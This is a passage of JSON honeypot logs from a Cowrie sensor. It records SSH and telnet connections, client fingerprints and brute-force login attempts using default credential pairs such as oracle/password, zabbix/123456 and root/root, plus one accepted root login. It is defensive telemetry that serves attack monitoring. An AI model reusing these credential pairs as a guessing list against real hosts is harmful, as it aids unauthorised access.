keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:31:18.048250Z","src_ip":"212.227.235.229","session":"be2cb7ce847b"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-31T04:31:23.823348Z","src_ip":"212.227.235.229","session":"be2cb7ce847b"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:31:25.509077Z","src_ip":"212.227.235.229","session":"be2cb7ce847b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56490,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b4d8c9a6c45","protocol":"ssh","message":"New connection: 212.227.125.160:56490 (1.2.3.4:22) [session: 1b4d8c9a6c45]","sensor":"my-vps","timestamp":"2025-08-31T04:31:26.256670Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:31:34.401566Z","src_ip":"212.227.125.160","session":"1b4d8c9a6c45"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:31:34.402533Z","src_ip":"212.227.125.160","session":"1b4d8c9a6c45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40372,"dst_ip":"1.2.3.4","dst_port":22,"session":"600da7e56885","protocol":"ssh","message":"New connection: 212.227.125.160:40372 (1.2.3.4:22) [session: 600da7e56885]","sensor":"my-vps","timestamp":"2025-08-31T04:31:38.073120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:31:38.652660Z","src_ip":"212.227.125.160","session":"600da7e56885"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:31:38.653590Z","src_ip":"212.227.125.160","session":"600da7e56885"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-31T04:31:41.177640Z","src_ip":"212.227.125.160","session":"600da7e56885"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:31:42.502436Z","src_ip":"212.227.125.160","session":"600da7e56885"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33256,"dst_ip":"1.2.3.4","dst_port":22,"session":"faae1a57c378","protocol":"ssh","message":"New connection: 212.227.235.229:33256 (1.2.3.4:22) [session: faae1a57c378]","sensor":"my-vps","timestamp":"2025-08-31T04:31:57.762633Z"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"123456","message":"login attempt [zabbix/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:31:59.270920Z","src_ip":"212.227.125.160","session":"1b4d8c9a6c45"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:32:00.837859Z","src_ip":"79.124.8.120","session":"41a95edd906e"}
{"eventid":"cowrie.session.closed","duration":180.0655436515808,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:32:00.841560Z","src_ip":"79.124.8.120","session":"41a95edd906e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:32:01.061676Z","src_ip":"212.227.235.229","session":"faae1a57c378"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:32:01.075990Z","src_ip":"212.227.235.229","session":"faae1a57c378"}
{"eventid":"cowrie.session.closed","duration":"38.2","message":"Connection lost after 38.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:32:04.492544Z","src_ip":"212.227.125.160","session":"1b4d8c9a6c45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57726,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a1ce9c5f92e","protocol":"ssh","message":"New connection: 212.227.235.229:57726 (1.2.3.4:22) [session: 7a1ce9c5f92e]","sensor":"my-vps","timestamp":"2025-08-31T04:32:15.578074Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:32:16.294656Z","src_ip":"212.227.235.229","session":"7a1ce9c5f92e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:32:16.295444Z","src_ip":"212.227.235.229","session":"7a1ce9c5f92e"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password1","message":"login attempt [oracle/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T04:32:22.258136Z","src_ip":"212.227.235.229","session":"7a1ce9c5f92e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45594,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfa2f19b40a8","protocol":"ssh","message":"New connection: 212.227.125.160:45594 (1.2.3.4:22) [session: dfa2f19b40a8]","sensor":"my-vps","timestamp":"2025-08-31T04:32:22.734627Z"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:32:24.136128Z","src_ip":"212.227.235.229","session":"7a1ce9c5f92e"}
{"eventid":"cowrie.session.connect","src_ip":"205.210.31.206","src_port":63956,"dst_ip":"1.2.3.4","dst_port":23,"session":"a121c4c92a04","protocol":"telnet","message":"New connection: 205.210.31.206:63956 (1.2.3.4:23) [session: a121c4c92a04]","sensor":"my-vps","timestamp":"2025-08-31T04:32:30.607903Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47568,"dst_ip":"1.2.3.4","dst_port":22,"session":"68fec5a629c4","protocol":"ssh","message":"New connection: 212.227.125.160:47568 (1.2.3.4:22) [session: 68fec5a629c4]","sensor":"my-vps","timestamp":"2025-08-31T04:32:37.108709Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:32:37.350168Z","src_ip":"212.227.125.160","session":"68fec5a629c4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:32:37.352875Z","src_ip":"212.227.125.160","session":"68fec5a629c4"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password1","message":"login attempt [oracle/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T04:32:39.744667Z","src_ip":"212.227.125.160","session":"68fec5a629c4"}
{"eventid":"cowrie.session.closed","duration":9.79219675064087,"message":"Connection lost after 9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:32:40.400033Z","src_ip":"205.210.31.206","session":"a121c4c92a04"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:32:40.808593Z","src_ip":"212.227.125.160","session":"dfa2f19b40a8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:32:40.809449Z","src_ip":"212.227.125.160","session":"dfa2f19b40a8"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:32:41.114516Z","src_ip":"212.227.125.160","session":"68fec5a629c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51830,"dst_ip":"1.2.3.4","dst_port":22,"session":"43fb2cf12d2d","protocol":"ssh","message":"New connection: 212.227.125.160:51830 (1.2.3.4:22) [session: 43fb2cf12d2d]","sensor":"my-vps","timestamp":"2025-08-31T04:32:50.017034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:32:50.018826Z","src_ip":"212.227.125.160","session":"43fb2cf12d2d"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T04:32:50.201755Z","src_ip":"212.227.125.160","session":"43fb2cf12d2d"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"123456","message":"login attempt [zabbix/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:32:54.639223Z","src_ip":"212.227.235.229","session":"faae1a57c378"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:32:58.017593Z","src_ip":"212.227.125.160","session":"43fb2cf12d2d"}
{"eventid":"cowrie.session.closed","duration":"67.2","message":"Connection lost after 67.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:33:04.957379Z","src_ip":"212.227.235.229","session":"faae1a57c378"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48124,"dst_ip":"1.2.3.4","dst_port":22,"session":"b44b87c0fece","protocol":"ssh","message":"New connection: 212.227.235.229:48124 (1.2.3.4:22) [session: b44b87c0fece]","sensor":"my-vps","timestamp":"2025-08-31T04:33:13.290154Z"}
{"eventid":"cowrie.login.success","username":"root","password":"4e2q1w3r","message":"login attempt [root/4e2q1w3r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:33:13.305620Z","src_ip":"212.227.125.160","session":"dfa2f19b40a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36034,"dst_ip":"1.2.3.4","dst_port":22,"session":"3807de662196","protocol":"ssh","message":"New connection: 212.227.235.229:36034 (1.2.3.4:22) [session: 3807de662196]","sensor":"my-vps","timestamp":"2025-08-31T04:33:14.806553Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:33:15.999218Z","src_ip":"212.227.235.229","session":"3807de662196"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:33:16.000026Z","src_ip":"212.227.235.229","session":"3807de662196"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"admin123","message":"login attempt [oracle/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:33:21.552907Z","src_ip":"212.227.235.229","session":"3807de662196"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:33:23.304383Z","src_ip":"212.227.235.229","session":"b44b87c0fece"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:33:23.305498Z","src_ip":"212.227.235.229","session":"b44b87c0fece"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:33:23.371579Z","src_ip":"212.227.235.229","session":"3807de662196"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.27.234","src_port":43892,"dst_ip":"1.2.3.4","dst_port":23,"session":"3ea755679f9d","protocol":"telnet","message":"New connection: 139.59.27.234:43892 (1.2.3.4:23) [session: 3ea755679f9d]","sensor":"my-vps","timestamp":"2025-08-31T04:33:31.057532Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T04:33:32.604666Z","src_ip":"139.59.27.234","session":"3ea755679f9d"}
{"eventid":"cowrie.session.closed","duration":3.8700921535491943,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:33:34.927556Z","src_ip":"139.59.27.234","session":"3ea755679f9d"}
